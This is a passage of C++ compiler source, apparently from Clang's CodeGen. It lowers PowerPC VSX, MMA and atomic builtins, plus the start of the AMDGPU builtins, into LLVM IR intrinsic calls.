F = CGM.getIntrinsic(Intrinsic::experimental_constrained_fma, ResultType);
else
F = CGM.getIntrinsic(Intrinsic::fma, ResultType);
switch (BuiltinID) {
case PPC::BI__builtin_vsx_xvmaddadp:
case PPC::BI__builtin_vsx_xvmaddasp:
if (Builder.getIsFPConstrained())
return Builder.CreateConstrainedFPCall(F, {X, Y, Z});
else
return Builder.CreateCall(F, {X, Y, Z});
case PPC::BI__builtin_vsx_xvnmaddadp:
case PPC::BI__builtin_vsx_xvnmaddasp:
if (Builder.getIsFPConstrained())
return Builder.CreateFNeg(
Builder.CreateConstrainedFPCall(F, {X, Y, Z}), "neg");
else
return Builder.CreateFNeg(Builder.CreateCall(F, {X, Y, Z}), "neg");
case PPC::BI__builtin_vsx_xvmsubadp:
case PPC::BI__builtin_vsx_xvmsubasp:
if (Builder.getIsFPConstrained())
return Builder.CreateConstrainedFPCall(
F, {X, Y, Builder.CreateFNeg(Z, "neg")});
else
return Builder.CreateCall(F, {X, Y, Builder.CreateFNeg(Z, "neg")});
case PPC::BI__builtin_vsx_xvnmsubadp:
case PPC::BI__builtin_vsx_xvnmsubasp:
if (Builder.getIsFPConstrained())
return Builder.CreateFNeg(
Builder.CreateConstrainedFPCall(
F, {X, Y, Builder.CreateFNeg(Z, "neg")}),
"neg");
else
return Builder.CreateFNeg(
Builder.CreateCall(F, {X, Y, Builder.CreateFNeg(Z, "neg")}),
"neg");
}
llvm_unreachable("Unknown FMA operation");
return nullptr; // Suppress no-return warning
}
case PPC::BI__builtin_vsx_insertword: {
llvm::Function *F = CGM.getIntrinsic(Intrinsic::ppc_vsx_xxinsertw);
// The third argument is a compile time constant int. It must be clamped
// to the range [0, 12].
ConstantInt *ArgCI = dyn_cast<ConstantInt>(Ops[2]);
assert(ArgCI &&
"Third arg to xxinsertw intrinsic must be constant integer");
const int64_t MaxIndex = 12;
int64_t Index = clamp(ArgCI->getSExtValue(), 0, MaxIndex);
// The builtin semantics don't exactly match the xxinsertw instruction's
// semantics (which ppc_vsx_xxinsertw follows). The builtin extracts the
// word from the first argument, and inserts it in the second argument. The
// instruction extracts the word from its second input register and inserts
// it into its first input register, so swap the first and second arguments.
std::swap(Ops[0], Ops[1]);
// Need to cast the second argument from a vector of unsigned int to a
// vector of long long.
Ops[1] =
Builder.CreateBitCast(Ops[1], llvm::FixedVectorType::get(Int64Ty, 2));
if (getTarget().isLittleEndian()) {
// Reverse the double words in the vector we will extract from.
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(Int64Ty, 2));
Ops[0] = Builder.CreateShuffleVector(Ops[0], Ops[0], ArrayRef<int>{1, 0});
// Reverse the index.
Index = MaxIndex - Index;
}
// Intrinsic expects the first arg to be a vector of int.
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(Int32Ty, 4));
Ops[2] = ConstantInt::getSigned(Int32Ty, Index);
return Builder.CreateCall(F, Ops);
}
case PPC::BI__builtin_vsx_extractuword: {
llvm::Function *F = CGM.getIntrinsic(Intrinsic::ppc_vsx_xxextractuw);
// Intrinsic expects the first argument to be a vector of doublewords.
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(Int64Ty, 2));
// The second argument is a compile time constant int that needs to
// be clamped to the range [0, 12].
ConstantInt *ArgCI = dyn_cast<ConstantInt>(Ops[1]);
assert(ArgCI &&
"Second Arg to xxextractuw intrinsic must be a constant integer!");
const int64_t MaxIndex = 12;
int64_t Index = clamp(ArgCI->getSExtValue(), 0, MaxIndex);
if (getTarget().isLittleEndian()) {
// Reverse the index.
Index = MaxIndex - Index;
Ops[1] = ConstantInt::getSigned(Int32Ty, Index);
// Emit the call, then reverse the double words of the results vector.
Value *Call = Builder.CreateCall(F, Ops);
Value *ShuffleCall =
Builder.CreateShuffleVector(Call, Call, ArrayRef<int>{1, 0});
return ShuffleCall;
} else {
Ops[1] = ConstantInt::getSigned(Int32Ty, Index);
return Builder.CreateCall(F, Ops);
}
}
case PPC::BI__builtin_vsx_xxpermdi: {
ConstantInt *ArgCI = dyn_cast<ConstantInt>(Ops[2]);
assert(ArgCI && "Third arg must be constant integer!");
unsigned Index = ArgCI->getZExtValue();
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(Int64Ty, 2));
Ops[1] =
Builder.CreateBitCast(Ops[1], llvm::FixedVectorType::get(Int64Ty, 2));
// Account for endianness by treating this as just a shuffle, using the
// same indices for both LE and BE in order to produce expected results in
// both cases.
int ElemIdx0 = (Index & 2) >> 1;
int ElemIdx1 = 2 + (Index & 1);
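// E.g. Index == 3 yields the mask {1, 3}: doubleword 1 of Ops[0] followed
// by doubleword 1 of Ops[1].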
int ShuffleElts[2] = {ElemIdx0, ElemIdx1};
Value *ShuffleCall =
Builder.CreateShuffleVector(Ops[0], Ops[1], ShuffleElts);
QualType BIRetType = E->getType();
auto RetTy = ConvertType(BIRetType);
return Builder.CreateBitCast(ShuffleCall, RetTy);
}
case PPC::BI__builtin_vsx_xxsldwi: {
ConstantInt *ArgCI = dyn_cast<ConstantInt>(Ops[2]);
assert(ArgCI && "Third argument must be a compile time constant");
unsigned Index = ArgCI->getZExtValue() & 0x3;
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(Int32Ty, 4));
Ops[1] =
Builder.CreateBitCast(Ops[1], llvm::FixedVectorType::get(Int32Ty, 4));
// Create a shuffle mask
int ElemIdx0;
int ElemIdx1;
int ElemIdx2;
int ElemIdx3;
if (getTarget().isLittleEndian()) {
// Little endian element N comes from element 8+N-Index of the
// concatenated wide vector (of course, using modulo arithmetic on
// the total number of elements).
ElemIdx0 = (8 - Index) % 8;
ElemIdx1 = (9 - Index) % 8;
ElemIdx2 = (10 - Index) % 8;
ElemIdx3 = (11 - Index) % 8;
} else {
// Big endian ElemIdx<N> = Index + N
ElemIdx0 = Index;
ElemIdx1 = Index + 1;
ElemIdx2 = Index + 2;
ElemIdx3 = Index + 3;
}
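// E.g. Index == 1 gives the mask {7, 0, 1, 2} on LE and {1, 2, 3, 4} on BE.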
int ShuffleElts[4] = {ElemIdx0, ElemIdx1, ElemIdx2, ElemIdx3};
Value *ShuffleCall =
Builder.CreateShuffleVector(Ops[0], Ops[1], ShuffleElts);
QualType BIRetType = E->getType();
auto RetTy = ConvertType(BIRetType);
return Builder.CreateBitCast(ShuffleCall, RetTy);
}
case PPC::BI__builtin_pack_vector_int128: {
bool isLittleEndian = getTarget().isLittleEndian();
Value *UndefValue =
llvm::UndefValue::get(llvm::FixedVectorType::get(Ops[0]->getType(), 2));
Value *Res = Builder.CreateInsertElement(
UndefValue, Ops[0], (uint64_t)(isLittleEndian ? 1 : 0));
Res = Builder.CreateInsertElement(Res, Ops[1],
(uint64_t)(isLittleEndian ? 0 : 1));
return Builder.CreateBitCast(Res, ConvertType(E->getType()));
}
case PPC::BI__builtin_unpack_vector_int128: {
ConstantInt *Index = cast<ConstantInt>(Ops[1]);
Value *Unpacked = Builder.CreateBitCast(
Ops[0], llvm::FixedVectorType::get(ConvertType(E->getType()), 2));
if (getTarget().isLittleEndian())
Index = ConstantInt::get(Index->getType(), 1 - Index->getZExtValue());
return Builder.CreateExtractElement(Unpacked, Index);
}
case PPC::BI__builtin_ppc_sthcx: {
llvm::Function *F = CGM.getIntrinsic(Intrinsic::ppc_sthcx);
Ops[0] = Builder.CreateBitCast(Ops[0], Int8PtrTy);
Ops[1] = Builder.CreateSExt(Ops[1], Int32Ty);
return Builder.CreateCall(F, Ops);
}
// The PPC MMA builtins take a pointer to a __vector_quad as an argument.
// Some of the MMA instructions accumulate their result into an existing
// accumulator whereas the others generate a new accumulator. So we need
// custom code generation that expands a builtin call into: a load of the
// accumulator (if the corresponding instruction accumulates its result),
// the call to the intrinsic, and a store of the result.
#define CUSTOM_BUILTIN(Name, Intr, Types, Accumulate) \
case PPC::BI__builtin_##Name:
#include "clang/Basic/BuiltinsPPC.def"
{
// The first argument of the disassemble builtins is a pointer used to
// store their result. However, the llvm intrinsics return their result in
// multiple return values. So, here we emit code extracting these values
// from the intrinsic results and storing them using that pointer.
if (BuiltinID == PPC::BI__builtin_mma_disassemble_acc ||
BuiltinID == PPC::BI__builtin_vsx_disassemble_pair ||
BuiltinID == PPC::BI__builtin_mma_disassemble_pair) {
unsigned NumVecs = 2;
auto Intrinsic = Intrinsic::ppc_vsx_disassemble_pair;
if (BuiltinID == PPC::BI__builtin_mma_disassemble_acc) {
NumVecs = 4;
Intrinsic = Intrinsic::ppc_mma_disassemble_acc;
}
llvm::Function *F = CGM.getIntrinsic(Intrinsic);
Address Addr = EmitPointerWithAlignment(E->getArg(1));
Value *Vec = Builder.CreateLoad(Addr);
Value *Call = Builder.CreateCall(F, {Vec});
llvm::Type *VTy = llvm::FixedVectorType::get(Int8Ty, 16);
Value *Ptr = Builder.CreateBitCast(Ops[0], VTy->getPointerTo());
for (unsigned i = 0; i < NumVecs; i++) {
Value *Vec = Builder.CreateExtractValue(Call, i);
llvm::ConstantInt *Index = llvm::ConstantInt::get(IntTy, i);
Value *GEP = Builder.CreateInBoundsGEP(VTy, Ptr, Index);
Builder.CreateAlignedStore(Vec, GEP, MaybeAlign(16));
}
return Call;
}
if (BuiltinID == PPC::BI__builtin_vsx_build_pair ||
BuiltinID == PPC::BI__builtin_mma_build_acc) {
// Reverse the order of the operands for LE, so the
// same builtin call can be used on both LE and BE
// without the need for the programmer to swap operands.
// The operands are reversed starting from the second argument; the first
// operand is the pointer to the pair/accumulator that is being built.
if (getTarget().isLittleEndian())
std::reverse(Ops.begin() + 1, Ops.end());
}
bool Accumulate;
switch (BuiltinID) {
#define CUSTOM_BUILTIN(Name, Intr, Types, Acc) \
case PPC::BI__builtin_##Name: \
ID = Intrinsic::ppc_##Intr; \
Accumulate = Acc; \
break;
#include "clang/Basic/BuiltinsPPC.def"
}
if (BuiltinID == PPC::BI__builtin_vsx_lxvp ||
BuiltinID == PPC::BI__builtin_vsx_stxvp ||
BuiltinID == PPC::BI__builtin_mma_lxvp ||
BuiltinID == PPC::BI__builtin_mma_stxvp) {
if (BuiltinID == PPC::BI__builtin_vsx_lxvp ||
BuiltinID == PPC::BI__builtin_mma_lxvp) {
Ops[1] = Builder.CreateBitCast(Ops[1], Int8PtrTy);
Ops[0] = Builder.CreateGEP(Int8Ty, Ops[1], Ops[0]);
} else {
Ops[2] = Builder.CreateBitCast(Ops[2], Int8PtrTy);
Ops[1] = Builder.CreateGEP(Int8Ty, Ops[2], Ops[1]);
}
Ops.pop_back();
llvm::Function *F = CGM.getIntrinsic(ID);
return Builder.CreateCall(F, Ops, "");
}
SmallVector<Value*, 4> CallOps;
if (Accumulate) {
Address Addr = EmitPointerWithAlignment(E->getArg(0));
Value *Acc = Builder.CreateLoad(Addr);
CallOps.push_back(Acc);
}
for (unsigned i = 1; i < Ops.size(); i++)
CallOps.push_back(Ops[i]);
llvm::Function *F = CGM.getIntrinsic(ID);
Value *Call = Builder.CreateCall(F, CallOps);
return Builder.CreateAlignedStore(Call, Ops[0], MaybeAlign(64));
}
case PPC::BI__builtin_ppc_compare_and_swap:
case PPC::BI__builtin_ppc_compare_and_swaplp: {
Address Addr = EmitPointerWithAlignment(E->getArg(0));
Address OldValAddr = EmitPointerWithAlignment(E->getArg(1));
Value *OldVal = Builder.CreateLoad(OldValAddr);
QualType AtomicTy = E->getArg(0)->getType()->getPointeeType();
LValue LV = MakeAddrLValue(Addr, AtomicTy);
auto Pair = EmitAtomicCompareExchange(
LV, RValue::get(OldVal), RValue::get(Ops[2]), E->getExprLoc(),
llvm::AtomicOrdering::Monotonic, llvm::AtomicOrdering::Monotonic, true);
// Unlike C11's atomic_compare_exchange, according to
// https://www.ibm.com/docs/en/xl-c-and-cpp-aix/16.1?topic=functions-compare-swap-compare-swaplp
// > In either case, the contents of the memory location specified by addr
// > are copied into the memory location specified by old_val_addr.
// The documentation does not specify whether the store to OldValAddr is
// atomic, nor which ordering to use. Following XL's codegen, treat it as a
// normal store.
Value *LoadedVal = Pair.first.getScalarVal();
Builder.CreateStore(LoadedVal, OldValAddr);
return Builder.CreateZExt(Pair.second, Builder.getInt32Ty());
}
case PPC::BI__builtin_ppc_fetch_and_add:
case PPC::BI__builtin_ppc_fetch_and_addlp: {
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Add, E,
llvm::AtomicOrdering::Monotonic);
}
case PPC::BI__builtin_ppc_fetch_and_and:
case PPC::BI__builtin_ppc_fetch_and_andlp: {
return MakeBinaryAtomicValue(*this, AtomicRMWInst::And, E,
llvm::AtomicOrdering::Monotonic);
}
case PPC::BI__builtin_ppc_fetch_and_or:
case PPC::BI__builtin_ppc_fetch_and_orlp: {
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Or, E,
llvm::AtomicOrdering::Monotonic);
}
case PPC::BI__builtin_ppc_fetch_and_swap:
case PPC::BI__builtin_ppc_fetch_and_swaplp: {
return MakeBinaryAtomicValue(*this, AtomicRMWInst::Xchg, E,
llvm::AtomicOrdering::Monotonic);
}
case PPC::BI__builtin_ppc_ldarx:
case PPC::BI__builtin_ppc_lwarx:
case PPC::BI__builtin_ppc_lharx:
case PPC::BI__builtin_ppc_lbarx:
return emitPPCLoadReserveIntrinsic(*this, BuiltinID, E);
case PPC::BI__builtin_ppc_mfspr: {
llvm::Type *RetType = CGM.getDataLayout().getTypeSizeInBits(VoidPtrTy) == 32
? Int32Ty
: Int64Ty;
Function *F = CGM.getIntrinsic(Intrinsic::ppc_mfspr, RetType);
return Builder.CreateCall(F, Ops);
}
case PPC::BI__builtin_ppc_mtspr: {
llvm::Type *RetType = CGM.getDataLayout().getTypeSizeInBits(VoidPtrTy) == 32
? Int32Ty
: Int64Ty;
Function *F = CGM.getIntrinsic(Intrinsic::ppc_mtspr, RetType);
return Builder.CreateCall(F, Ops);
}
case PPC::BI__builtin_ppc_popcntb: {
Value *ArgValue = EmitScalarExpr(E->getArg(0));
llvm::Type *ArgType = ArgValue->getType();
Function *F = CGM.getIntrinsic(Intrinsic::ppc_popcntb, {ArgType, ArgType});
return Builder.CreateCall(F, Ops, "popcntb");
}
case PPC::BI__builtin_ppc_mtfsf: {
// The builtin takes a uint32 that needs to be converted to an
// f64 to be passed to the intrinsic.
Value *Cast = Builder.CreateUIToFP(Ops[1], DoubleTy);
llvm::Function *F = CGM.getIntrinsic(Intrinsic::ppc_mtfsf);
return Builder.CreateCall(F, {Ops[0], Cast}, "");
}
case PPC::BI__builtin_ppc_swdiv_nochk:
case PPC::BI__builtin_ppc_swdivs_nochk: {
FastMathFlags FMF = Builder.getFastMathFlags();
Builder.getFastMathFlags().setFast();
Value *FDiv = Builder.CreateFDiv(Ops[0], Ops[1], "swdiv_nochk");
Builder.getFastMathFlags() &= FMF;
return FDiv;
}
case PPC::BI__builtin_ppc_fric:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(
*this, E, Intrinsic::rint,
Intrinsic::experimental_constrained_rint))
.getScalarVal();
case PPC::BI__builtin_ppc_frim:
case PPC::BI__builtin_ppc_frims:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(
*this, E, Intrinsic::floor,
Intrinsic::experimental_constrained_floor))
.getScalarVal();
case PPC::BI__builtin_ppc_frin:
case PPC::BI__builtin_ppc_frins:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(
*this, E, Intrinsic::round,
Intrinsic::experimental_constrained_round))
.getScalarVal();
case PPC::BI__builtin_ppc_frip:
case PPC::BI__builtin_ppc_frips:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(
*this, E, Intrinsic::ceil,
Intrinsic::experimental_constrained_ceil))
.getScalarVal();
case PPC::BI__builtin_ppc_friz:
case PPC::BI__builtin_ppc_frizs:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(
*this, E, Intrinsic::trunc,
Intrinsic::experimental_constrained_trunc))
.getScalarVal();
case PPC::BI__builtin_ppc_fsqrt:
case PPC::BI__builtin_ppc_fsqrts:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(
*this, E, Intrinsic::sqrt,
Intrinsic::experimental_constrained_sqrt))
.getScalarVal();
case PPC::BI__builtin_ppc_test_data_class: {
llvm::Type *ArgType = EmitScalarExpr(E->getArg(0))->getType();
unsigned IntrinsicID;
if (ArgType->isDoubleTy())
IntrinsicID = Intrinsic::ppc_test_data_class_d;
else if (ArgType->isFloatTy())
IntrinsicID = Intrinsic::ppc_test_data_class_f;
else
llvm_unreachable("Invalid Argument Type");
return Builder.CreateCall(CGM.getIntrinsic(IntrinsicID), Ops,
"test_data_class");
}
case PPC::BI__builtin_ppc_swdiv:
case PPC::BI__builtin_ppc_swdivs:
return Builder.CreateFDiv(Ops[0], Ops[1], "swdiv");
}
}
namespace {
// If \p E is not a null pointer, insert an address space cast to match the
// return type of \p E if necessary.
Value *EmitAMDGPUDispatchPtr(CodeGenFunction &CGF,
const CallExpr *E = nullptr) {
auto *F = CGF.CGM.getIntrinsic(Intrinsic::amdgcn_dispatch_ptr);
auto *Call = CGF.Builder.CreateCall(F);
Call->addRetAttr(
Attribute::getWithDereferenceableBytes(Call->getContext(), 64));
Call->addRetAttr(Attribute::getWithAlignment(Call->getContext(), Align(4)));
if (!E)
return Call;
QualType BuiltinRetType = E->getType();
auto *RetTy = cast<llvm::PointerType>(CGF.ConvertType(BuiltinRetType));
if (RetTy == Call->getType())
return Call;
return CGF.Builder.CreateAddrSpaceCast(Call, RetTy);
}
// \p Index is 0, 1, or 2 for the x, y, and z dimensions, respectively.
Value *EmitAMDGPUWorkGroupSize(CodeGenFunction &CGF, unsigned Index) {
const unsigned XOffset = 4;
auto *DP = EmitAMDGPUDispatchPtr(CGF);
// Indexing the HSA kernel_dispatch_packet struct.
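// Relevant fields of hsa_kernel_dispatch_packet_t (a sketch, per the HSA
// spec):
//   offset 4: uint16_t workgroup_size_x;
//   offset 6: uint16_t workgroup_size_y;
//   offset 8: uint16_t workgroup_size_z;
// hence XOffset == 4 with a 2-byte stride per dimension.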
auto *Offset = llvm::ConstantInt::get(CGF.Int32Ty, XOffset + Index * 2);
auto *GEP = CGF.Builder.CreateGEP(CGF.Int8Ty, DP, Offset);
auto *DstTy =
CGF.Int16Ty->getPointerTo(GEP->getType()->getPointerAddressSpace());
auto *Cast = CGF.Builder.CreateBitCast(GEP, DstTy);
auto *LD = CGF.Builder.CreateLoad(Address(Cast, CharUnits::fromQuantity(2)));
llvm::MDBuilder MDHelper(CGF.getLLVMContext());
llvm::MDNode *RNode = MDHelper.createRange(APInt(16, 1),
APInt(16, CGF.getTarget().getMaxOpenCLWorkGroupSize() + 1));
LD->setMetadata(llvm::LLVMContext::MD_range, RNode);
LD->setMetadata(llvm::LLVMContext::MD_invariant_load,
llvm::MDNode::get(CGF.getLLVMContext(), None));
return LD;
}
// \p Index is 0, 1, or 2 for the x, y, and z dimensions, respectively.
Value *EmitAMDGPUGridSize(CodeGenFunction &CGF, unsigned Index) {
const unsigned XOffset = 12;
auto *DP = EmitAMDGPUDispatchPtr(CGF);
// Indexing the HSA kernel_dispatch_packet struct.
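// Relevant fields of hsa_kernel_dispatch_packet_t (a sketch, per the HSA
// spec):
//   offset 12: uint32_t grid_size_x;
//   offset 16: uint32_t grid_size_y;
//   offset 20: uint32_t grid_size_z;
// hence XOffset == 12 with a 4-byte stride per dimension.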
auto *Offset = llvm::ConstantInt::get(CGF.Int32Ty, XOffset + Index * 4);
auto *GEP = CGF.Builder.CreateGEP(CGF.Int8Ty, DP, Offset);
auto *DstTy =
CGF.Int32Ty->getPointerTo(GEP->getType()->getPointerAddressSpace());
auto *Cast = CGF.Builder.CreateBitCast(GEP, DstTy);
auto *LD = CGF.Builder.CreateLoad(Address(Cast, CharUnits::fromQuantity(4)));
LD->setMetadata(llvm::LLVMContext::MD_invariant_load,
llvm::MDNode::get(CGF.getLLVMContext(), None));
return LD;
}
} // namespace
// For processing memory ordering and memory scope arguments of various
// amdgcn builtins.
// \p Order takes a C++11-compatible memory-ordering specifier and converts
// it into LLVM's memory ordering specifier using the atomic C ABI, writing
// the result to \p AO. \p Scope takes a const char * and converts it into
// an AMDGCN-specific SyncScopeID, writing it to \p SSID.
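// For example, __builtin_amdgcn_fence(__ATOMIC_ACQUIRE, "workgroup") yields
// AO == llvm::AtomicOrdering::Acquire and the sync scope ID for
// "workgroup".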
bool CodeGenFunction::ProcessOrderScopeAMDGCN(Value *Order, Value *Scope,
llvm::AtomicOrdering &AO,
llvm::SyncScope::ID &SSID) {
if (isa<llvm::ConstantInt>(Order)) {
int ord = cast<llvm::ConstantInt>(Order)->getZExtValue();
// Map C11/C++11 memory ordering to LLVM memory ordering
assert(llvm::isValidAtomicOrderingCABI(ord));
switch (static_cast<llvm::AtomicOrderingCABI>(ord)) {
case llvm::AtomicOrderingCABI::acquire:
case llvm::AtomicOrderingCABI::consume:
AO = llvm::AtomicOrdering::Acquire;
break;
case llvm::AtomicOrderingCABI::release:
AO = llvm::AtomicOrdering::Release;
break;
case llvm::AtomicOrderingCABI::acq_rel:
AO = llvm::AtomicOrdering::AcquireRelease;
break;
case llvm::AtomicOrderingCABI::seq_cst:
AO = llvm::AtomicOrdering::SequentiallyConsistent;
break;
case llvm::AtomicOrderingCABI::relaxed:
AO = llvm::AtomicOrdering::Monotonic;
break;
}
StringRef scp;
llvm::getConstantStringInfo(Scope, scp);
SSID = getLLVMContext().getOrInsertSyncScopeID(scp);
return true;
}
return false;
}
Value *CodeGenFunction::EmitAMDGPUBuiltinExpr(unsigned BuiltinID,
const CallExpr *E) {
llvm::AtomicOrdering AO = llvm::AtomicOrdering::SequentiallyConsistent;
llvm::SyncScope::ID SSID;
switch (BuiltinID) {
case AMDGPU::BI__builtin_amdgcn_div_scale:
case AMDGPU::BI__builtin_amdgcn_div_scalef: {
// Translate from the intrinsic's struct return to the builtin's out
// argument.
Address FlagOutPtr = EmitPointerWithAlignment(E->getArg(3));
llvm::Value *X = EmitScalarExpr(E->getArg(0));
llvm::Value *Y = EmitScalarExpr(E->getArg(1));
llvm::Value *Z = EmitScalarExpr(E->getArg(2));
llvm::Function *Callee = CGM.getIntrinsic(Intrinsic::amdgcn_div_scale,
X->getType());
llvm::Value *Tmp = Builder.CreateCall(Callee, {X, Y, Z});
llvm::Value *Result = Builder.CreateExtractValue(Tmp, 0);
llvm::Value *Flag = Builder.CreateExtractValue(Tmp, 1);
llvm::Type *RealFlagType
= FlagOutPtr.getPointer()->getType()->getPointerElementType();
llvm::Value *FlagExt = Builder.CreateZExt(Flag, RealFlagType);
Builder.CreateStore(FlagExt, FlagOutPtr);
return Result;
}
case AMDGPU::BI__builtin_amdgcn_div_fmas:
case AMDGPU::BI__builtin_amdgcn_div_fmasf: {
llvm::Value *Src0 = EmitScalarExpr(E->getArg(0));
llvm::Value *Src1 = EmitScalarExpr(E->getArg(1));
llvm::Value *Src2 = EmitScalarExpr(E->getArg(2));
llvm::Value *Src3 = EmitScalarExpr(E->getArg(3));
llvm::Function *F = CGM.getIntrinsic(Intrinsic::amdgcn_div_fmas,
Src0->getType());
llvm::Value *Src3ToBool = Builder.CreateIsNotNull(Src3);
return Builder.CreateCall(F, {Src0, Src1, Src2, Src3ToBool});
}
case AMDGPU::BI__builtin_amdgcn_ds_swizzle:
return emitBinaryBuiltin(*this, E, Intrinsic::amdgcn_ds_swizzle);
case AMDGPU::BI__builtin_amdgcn_mov_dpp8:
return emitBinaryBuiltin(*this, E, Intrinsic::amdgcn_mov_dpp8);
case AMDGPU::BI__builtin_amdgcn_mov_dpp:
case AMDGPU::BI__builtin_amdgcn_update_dpp: {
llvm::SmallVector<llvm::Value *, 6> Args;
for (unsigned I = 0; I != E->getNumArgs(); ++I)
Args.push_back(EmitScalarExpr(E->getArg(I)));
assert(Args.size() == 5 || Args.size() == 6);
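// __builtin_amdgcn_mov_dpp has no 'old' operand, so synthesize an undef one;
// both builtins then lower to the 6-operand llvm.amdgcn.update.dpp intrinsic.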
if (Args.size() == 5)
Args.insert(Args.begin(), llvm::UndefValue::get(Args[0]->getType()));
Function *F =
CGM.getIntrinsic(Intrinsic::amdgcn_update_dpp, Args[0]->getType());
return Builder.CreateCall(F, Args);
}
case AMDGPU::BI__builtin_amdgcn_div_fixup:
case AMDGPU::BI__builtin_amdgcn_div_fixupf:
case AMDGPU::BI__builtin_amdgcn_div_fixuph:
return emitTernaryBuiltin(*this, E, Intrinsic::amdgcn_div_fixup);
case AMDGPU::BI__builtin_amdgcn_trig_preop:
case AMDGPU::BI__builtin_amdgcn_trig_preopf:
return emitFPIntBuiltin(*this, E, Intrinsic::amdgcn_trig_preop);
case AMDGPU::BI__builtin_amdgcn_rcp:
case AMDGPU::BI__builtin_amdgcn_rcpf:
case AMDGPU::BI__builtin_amdgcn_rcph:
return emitUnaryBuiltin(*this, E, Intrinsic::amdgcn_rcp);
case AMDGPU::BI__builtin_amdgcn_sqrt:
case AMDGPU::BI__builtin_amdgcn_sqrtf:
case AMDGPU::BI__builtin_amdgcn_sqrth:
return emitUnaryBuiltin(*this, E, Intrinsic::amdgcn_sqrt);
case AMDGPU::BI__builtin_amdgcn_rsq:
case AMDGPU::BI__builtin_amdgcn_rsqf:
case AMDGPU::BI__builtin_amdgcn_rsqh:
return emitUnaryBuiltin(*this, E, Intrinsic::amdgcn_rsq);
case AMDGPU::BI__builtin_amdgcn_rsq_clamp:
case AMDGPU::BI__builtin_amdgcn_rsq_clampf:
return emitUnaryBuiltin(*this, E, Intrinsic::amdgcn_rsq_clamp);
case AMDGPU::BI__builtin_amdgcn_sinf:
case AMDGPU::BI__builtin_amdgcn_sinh:
return emitUnaryBuiltin(*this, E, Intrinsic::amdgcn_sin);
case AMDGPU::BI__builtin_amdgcn_cosf:
case AMDGPU::BI__builtin_amdgcn_cosh:
return emitUnaryBuiltin(*this, E, Intrinsic::amdgcn_cos);
case AMDGPU::BI__builtin_amdgcn_dispatch_ptr:
return EmitAMDGPUDispatchPtr(*this, E);
case AMDGPU::BI__builtin_amdgcn_log_clampf:
return emitUnaryBuiltin(*this, E, Intrinsic::amdgcn_log_clamp);
case AMDGPU::BI__builtin_amdgcn_ldexp:
case AMDGPU::BI__builtin_amdgcn_ldexpf:
case AMDGPU::BI__builtin_amdgcn_ldexph:
return emitFPIntBuiltin(*this, E, Intrinsic::amdgcn_ldexp);
case AMDGPU::BI__builtin_amdgcn_frexp_mant:
case AMDGPU::BI__builtin_amdgcn_frexp_mantf:
case AMDGPU::BI__builtin_amdgcn_frexp_manth:
return emitUnaryBuiltin(*this, E, Intrinsic::amdgcn_frexp_mant);
case AMDGPU::BI__builtin_amdgcn_frexp_exp:
case AMDGPU::BI__builtin_amdgcn_frexp_expf: {
Value *Src0 = EmitScalarExpr(E->getArg(0));
Function *F = CGM.getIntrinsic(Intrinsic::amdgcn_frexp_exp,
{ Builder.getInt32Ty(), Src0->getType() });
return Builder.CreateCall(F, Src0);
}
case AMDGPU::BI__builtin_amdgcn_frexp_exph: {
Value *Src0 = EmitScalarExpr(E->getArg(0));
Function *F = CGM.getIntrinsic(Intrinsic::amdgcn_frexp_exp,
{ Builder.getInt16Ty(), Src0->getType() });
return Builder.CreateCall(F, Src0);
}
case AMDGPU::BI__builtin_amdgcn_fract:
case AMDGPU::BI__builtin_amdgcn_fractf:
case AMDGPU::BI__builtin_amdgcn_fracth:
return emitUnaryBuiltin(*this, E, Intrinsic::amdgcn_fract);
case AMDGPU::BI__builtin_amdgcn_lerp:
return emitTernaryBuiltin(*this, E, Intrinsic::amdgcn_lerp);
case AMDGPU::BI__builtin_amdgcn_ubfe:
return emitTernaryBuiltin(*this, E, Intrinsic::amdgcn_ubfe);
case AMDGPU::BI__builtin_amdgcn_sbfe:
return emitTernaryBuiltin(*this, E, Intrinsic::amdgcn_sbfe);
case AMDGPU::BI__builtin_amdgcn_uicmp:
case AMDGPU::BI__builtin_amdgcn_uicmpl:
case AMDGPU::BI__builtin_amdgcn_sicmp:
case AMDGPU::BI__builtin_amdgcn_sicmpl: {
llvm::Value *Src0 = EmitScalarExpr(E->getArg(0));
llvm::Value *Src1 = EmitScalarExpr(E->getArg(1));
llvm::Value *Src2 = EmitScalarExpr(E->getArg(2));
// FIXME-GFX10: How should 32 bit mask be handled?
Function *F = CGM.getIntrinsic(Intrinsic::amdgcn_icmp,
{ Builder.getInt64Ty(), Src0->getType() });
return Builder.CreateCall(F, { Src0, Src1, Src2 });
}
case AMDGPU::BI__builtin_amdgcn_fcmp:
case AMDGPU::BI__builtin_amdgcn_fcmpf: {
llvm::Value *Src0 = EmitScalarExpr(E->getArg(0));
llvm::Value *Src1 = EmitScalarExpr(E->getArg(1));
llvm::Value *Src2 = EmitScalarExpr(E->getArg(2));
// FIXME-GFX10: How should 32 bit mask be handled?
Function *F = CGM.getIntrinsic(Intrinsic::amdgcn_fcmp,
{ Builder.getInt64Ty(), Src0->getType() });
return Builder.CreateCall(F, { Src0, Src1, Src2 });
}
case AMDGPU::BI__builtin_amdgcn_class:
case AMDGPU::BI__builtin_amdgcn_classf:
case AMDGPU::BI__builtin_amdgcn_classh:
return emitFPIntBuiltin(*this, E, Intrinsic::amdgcn_class);
case AMDGPU::BI__builtin_amdgcn_fmed3f:
case AMDGPU::BI__builtin_amdgcn_fmed3h:
return emitTernaryBuiltin(*this, E, Intrinsic::amdgcn_fmed3);
case AMDGPU::BI__builtin_amdgcn_ds_append:
case AMDGPU::BI__builtin_amdgcn_ds_consume: {
Intrinsic::ID Intrin = BuiltinID == AMDGPU::BI__builtin_amdgcn_ds_append ?
Intrinsic::amdgcn_ds_append : Intrinsic::amdgcn_ds_consume;
Value *Src0 = EmitScalarExpr(E->getArg(0));
